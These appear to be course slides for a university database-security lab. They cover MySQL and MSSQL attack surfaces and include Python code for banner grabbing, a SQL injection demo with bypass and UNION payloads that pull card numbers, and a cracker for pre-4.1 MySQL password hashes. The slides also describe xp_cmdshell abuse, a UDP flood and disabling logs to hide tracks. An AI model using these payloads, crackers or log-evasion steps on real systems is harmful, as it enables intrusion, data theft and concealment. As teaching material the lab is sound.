Databases - ECE Users Pages
Databases
Kevin Wright
Ben Bruckner
Group 40
Outline
Background
Vulnerabilities
Log File Cleaning
This Lab
Background: Databases
Store very large volumes of information
Credit card numbers
Names
Dates
Database servers make this information available to web applications, and through them to the internet
Retail sites can remember your billing and shipping information
Allows web surfers to browse through all of a company's products online
Background: SQL Servers
Group data into tables and tables into databases
Database servers are generally not connected directly to the internet, but rather are connected to web servers
SQL = Structured Query Language, which can be used to create, delete, modify, or query data from a database
Typical Database Server Setup
(diagram) User's machine --internet--> Company's internet server ---> Company's database server
  Internet-facing server: lots of security
  Database server behind it: not much security
  Attacks: password crack, buffer overflow, SQL injection, weak default settings, etc.
Different Databases
MySQL 4.23
  http://www.mysql.com
  "The world's most popular open source database"
  Runs on Windows and a wide variety of Unix operating systems, including Mac OS X
  Since it is open source, we can use it for free
Microsoft SQL Server 2000
  Very popular (because it's Microsoft)
  Runs on a "more user friendly" GUI than MySQL
  In the lab, we will actually be using a free trial version because the full version costs between $1,000 and $20,000 per machine.
Other databases include Oracle, IBM DB2, Sybase, etc.
Using a Database Server
The database server is set up on a computer and acts much like a web server: it listens on a well-known port and answers requests from clients
MySQL listens on TCP port 3306
MSSQL listens on TCP port 1433 (the database engine) and UDP port 1434 (the SQL Server Resolution Service, which tells clients which instance is on which port)
Other computers can connect remotely to this database server and access information
Access privileges are controlled with usernames and passwords, much like in Unix; the server also decides, per source host, whether a client is allowed to connect at all
Numerous exploits exist that grant root (administrator) access, thus allowing the attacker to reach everything that is stored in the database, or that crash the database server
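Before any password is sent, a MySQL server announces itself on port 3306, and that greeting alone tells an attacker (or an auditor) which version is running and which authentication protocol it uses. The following is an added example, not part of the original slides: a parser for that greeting, run offline against a constructed sample packet. The packet layout, capability bits and error code are from the MySQL client/server protocol; the sample version string, thread id, scramble and client address are made up for the example.

```python
import socket
import struct

# Capability bits a server advertises in its greeting (MySQL client/server protocol).
CLIENT_PROTOCOL_41 = 0x0200        # 4.1 protocol: 20-byte scramble, new password hash
CLIENT_SSL = 0x0800                # server can switch the connection to SSL
CLIENT_SECURE_CONNECTION = 0x8000  # supports the 4.1 challenge/response authentication


def build_greeting(version=b"4.0.23-standard", thread_id=7,
                   scramble=b"abcdefgh", capabilities=0x002C):
    """Constructed sample of the protocol-10 greeting a MySQL server sends on
    TCP 3306 before the client authenticates (test data, not a real capture)."""
    body = (bytes([10])                        # protocol version
            + version + b"\x00"                # NUL-terminated server version
            + struct.pack("<I", thread_id)     # connection (thread) id
            + scramble + b"\x00"               # 8-byte scramble + NUL
            + struct.pack("<H", capabilities)  # capability flags, low 16 bits
            + bytes([8])                       # server charset (latin1)
            + struct.pack("<H", 2)             # status flags (autocommit)
            + b"\x00" * 13)                    # filler
    header = len(body).to_bytes(3, "little") + b"\x00"  # length + sequence id 0
    return header + body


def build_error(code=1130,
                message=b"Host '10.0.0.5' is not allowed to connect to this MySQL server"):
    """Constructed sample of the ERR packet returned instead of a greeting
    when the client's address has no entry in the server's privilege tables."""
    body = b"\xff" + struct.pack("<H", code) + message
    return len(body).to_bytes(3, "little") + b"\x00" + body


def parse_greeting(packet):
    """Parse the first server packet and report what is learned without a
    password: version, protocol level and whether the weak pre-4.1
    authentication is still in use."""
    if len(packet) < 5:
        raise ValueError("packet too short")
    length = int.from_bytes(packet[0:3], "little")
    body = packet[4:4 + length]
    if len(body) != length:
        raise ValueError("truncated packet")
    if body[0] == 0xFF:  # ERR packet rather than a greeting
        code = struct.unpack_from("<H", body, 1)[0]
        return {"error": code, "message": body[3:].decode("latin-1", "replace")}
    proto = body[0]
    end = body.index(b"\x00", 1)
    version = body[1:end].decode("ascii", "replace")
    pos = end + 1
    thread_id = struct.unpack_from("<I", body, pos)[0]
    pos += 4
    scramble = body[pos:pos + 8]
    pos += 9  # 8 scramble bytes plus the NUL terminator
    caps = struct.unpack_from("<H", body, pos)[0]
    return {
        "protocol": proto,
        "server_version": version,
        "thread_id": thread_id,
        "scramble": scramble,
        "capabilities": caps,
        "protocol_41": bool(caps & CLIENT_PROTOCOL_41),
        "ssl": bool(caps & CLIENT_SSL),
        # Without CLIENT_SECURE_CONNECTION the server checks passwords with the
        # old 16-hex-digit hash and an 8-byte challenge.
        "weak_auth": not (caps & CLIENT_SECURE_CONNECTION),
    }


def grab_greeting(host, port=3306, timeout=3.0):
    """Fetch and parse the greeting from a live server. Not exercised by the
    offline samples; use it only against hosts you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        packet = sock.recv(4096)
    return parse_greeting(packet)


if __name__ == "__main__":
    print(parse_greeting(build_greeting()))
    print(parse_greeting(build_error()))
```

A 4.0 server such as the sample sets neither CLIENT_PROTOCOL_41 nor CLIENT_SECURE_CONNECTION, which is the cue that the short-hash password scheme is in use; a 4.1 server sets both. An ERR packet in place of the greeting means the host-based access control rejected the client before any password was tried.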
MySQL Vulnerabilities
Numerous buffer overflow vulnerabilities allow attacker-supplied code to run with the privileges of the server process (root, if mysqld is run as root) or can be used for denial-of-service (DoS) attacks
Password authentication is weak: the pre-4.1 password scheme can be exploited so that a user can log on as someone else (sometimes root)
There are several ways for someone with an ordinary user account to gain root privileges just by using the right combination of SQL commands
Many others...
MSSQL Vulnerabilities
The target of many worms such as SQLSnake and SQLSlammer
Many of the default settings are exploitable (such as the system administrator account, sa, being installed with a null password, which is exactly what SQLSnake scanned for)
Again, buffer overflow vulnerabilities are abundant
Many others...
It is essential to be diligent about downloading the newest patches for MSSQL (and all other Microsoft products): the overflow Slammer used had been patched six months before the worm appeared
Other Vulnerabilities
SQL Injection
  A database that is linked to a website via a form
  SQL commands are entered into the form fields; if the application pastes the field values into its query text, the database executes the attacker's commands with the application's privileges
ODBC (Open Database Connectivity) and JDBC (Java Database Connectivity), the driver layers through which applications connect to the database
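The form-to-query path described above, shown as an added example that is not part of the original slides. It runs against an in-memory SQLite database standing in for the MySQL or MSSQL server behind the website (an assumption made so the example runs offline); the table, rows, card numbers and payloads are constructed. The vulnerable login pastes the form fields into the query text; the hardened one passes them as bound parameters.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for a retail site's customer table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT, card TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (name, password, card) VALUES (?, ?, ?)",
        [
            ("alice", "s3cret", "4111-1111-1111-1111"),
            ("bob", "hunter2", "5500-0000-0000-0004"),
        ],
    )
    return conn


def login_vulnerable(conn, name, password):
    """The two form fields are pasted straight into the SQL text, so whatever
    the user typed is parsed by the database as part of the query."""
    sql = ("SELECT id, name FROM users WHERE name = '%s' AND password = '%s'"
           % (name, password))
    return conn.execute(sql).fetchall()


def login_safe(conn, name, password):
    """Same query, but the values travel as bound parameters: the database
    never parses them as SQL, so the payloads below are just odd strings."""
    sql = "SELECT id, name FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchall()


# Constructed payloads of the kind typed into the web form's fields.
BYPASS = "' OR '1'='1"                           # makes the WHERE clause always true
EXFIL = "' UNION SELECT id, card FROM users --"  # bolts on a query that returns card numbers


def demo():
    """Run each login variant and return the rows the website would get back."""
    conn = make_db()
    return {
        "normal": login_vulnerable(conn, "alice", "s3cret"),
        "bypass": login_vulnerable(conn, BYPASS, BYPASS),
        "exfil": login_vulnerable(conn, EXFIL, ""),
        "safe_bypass": login_safe(conn, BYPASS, BYPASS),
        "safe_exfil": login_safe(conn, EXFIL, ""),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

With the vulnerable version the first payload logs the attacker in as the first user in the table without a password, and the second returns every stored card number through a login form; the parameterised version returns nothing for either. The trailing `--` turns the rest of the application's query into a comment, which is why the password clause never gets in the way.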
Log File Editing
Most, if not all, servers keep a log of all of the transactions that take place
A perfect attack would be one which left no evidence of anything ever occurring
Much of what is recorded in server logs (source address, account used, queries issued, timing) can be used to track down the attacker
In the lab, you will halt the logging function before you do anything malicious so that no trace is left behind
This is not a clean erasure: a gap in a normally continuous log is itself something an investigator will notice, and the connection that turned logging off may already have been recorded before it stopped
MySQL Exploits Used in This Lab
Password busting
  Run a simple script that recovers the root password by brute force: the stored hash cannot be reversed, so the script hashes candidate passwords until one matches the value in the user table
Privilege Escalation
  Start with user access
  Using only SQL commands, gain root access
Denial of Service
  Remotely shut the server down by flooding port 3306 with UDP traffic (MySQL itself listens on TCP 3306, so this exhausts the host's network resources rather than exploiting a flaw in the MySQL protocol)
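The password-busting step, as an added example that is not the lab's own script: a re-implementation of the PASSWORD() function MySQL used before 4.1 (the 16-hex-digit hashes stored in mysql.user on a 3.23/4.0 server, the generation the slides use), plus a dictionary attack and a short exhaustive search against it. The hash algorithm follows the original C code with 32-bit arithmetic; the check in `main` is against the widely documented value PASSWORD('test') = 378b243e220ca493. The wordlist and the user rows are constructed for the example.

```python
import itertools
import string


def mysql323_hash(password: str) -> str:
    """PASSWORD() as implemented by MySQL before 4.1. All arithmetic is
    reduced modulo 2**32 to match the original unsigned 32-bit C code."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for ch in password:
        if ch in " \t":          # the original skips spaces and tabs
            continue
        tmp = ord(ch)
        nr ^= (((nr & 63) + add) * tmp) + (nr << 8)
        nr &= 0xFFFFFFFF
        nr2 += (nr2 << 8) ^ nr
        nr2 &= 0xFFFFFFFF
        add += tmp
    # The stored value drops the sign bit of each 32-bit half.
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def crack_wordlist(target_hash, wordlist):
    """Dictionary attack: hash each candidate and compare with the stored hash.
    Returns the password, or None if it is not in the list."""
    target_hash = target_hash.lower()
    for candidate in wordlist:
        if mysql323_hash(candidate) == target_hash:
            return candidate
    return None


def crack_brute(target_hash, alphabet=string.ascii_lowercase, max_len=4):
    """Exhaustive search over short passwords drawn from `alphabet`, shortest
    first. Shows why a short lowercase root password falls in seconds."""
    target_hash = target_hash.lower()
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet, repeat=n):
            candidate = "".join(tup)
            if mysql323_hash(candidate) == target_hash:
                return candidate
    return None


def crack_user_table(rows, wordlist):
    """Run the dictionary attack over (user, hash) pairs as they would be read
    from mysql.user. Returns {user: password} for every account recovered."""
    found = {}
    for user, stored in rows:
        pw = crack_wordlist(stored, wordlist)
        if pw is not None:
            found[user] = pw
    return found


# Constructed wordlist and sample user rows (not data from a real server).
SAMPLE_WORDLIST = ["password", "123456", "admin", "letmein", "test", "qwerty"]
SAMPLE_USERS = [
    ("root", "378b243e220ca493"),          # hash of "test"
    ("web", mysql323_hash("xk7Qp9zL")),    # not in the wordlist
]


if __name__ == "__main__":
    assert mysql323_hash("test") == "378b243e220ca493"
    print("recovered:", crack_user_table(SAMPLE_USERS, SAMPLE_WORDLIST))
    print("brute force:", crack_brute(mysql323_hash("sql"), max_len=3))
```

The hash is unsalted, so one table of precomputed hashes cracks every server, and the 31-bit halves give far less work than the 64 hex digits suggest. Note that 4.1 and later store a different, SHA-1 based hash prefixed with `*`; this function is wrong for those and the cracker will simply report no match.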
MSSQL Exploits Used in This Lab
Password
XP_CMDSHELL
  The MSSQL extended stored procedure xp_cmdshell runs a command line in a Windows shell
  If we gain access to a Windows command shell, we gain access to the server: the command runs with the privileges of the SQL Server service account, which on many SQL Server 2000 installations is LocalSystem or another administrator-level account
Slammer Worm
  The worm was widely circulated and targeted a stack buffer overflow in the SQL Server 2000 Resolution Service (UDP port 1434, patched by Microsoft bulletin MS02-039); it carried no destructive payload, but the scanning traffic from infected hosts produced a Denial of Service (DoS) on those hosts and across the networks between them
Lab Overview
Machines running MySQL server and MSSQL server have been set up by the TAs
You must gain access to these machines to run the aforementioned exploits on the servers
The exploits will either shut the servers down or give you access to sensitive information
Explore how to disable the logger to cover your tracks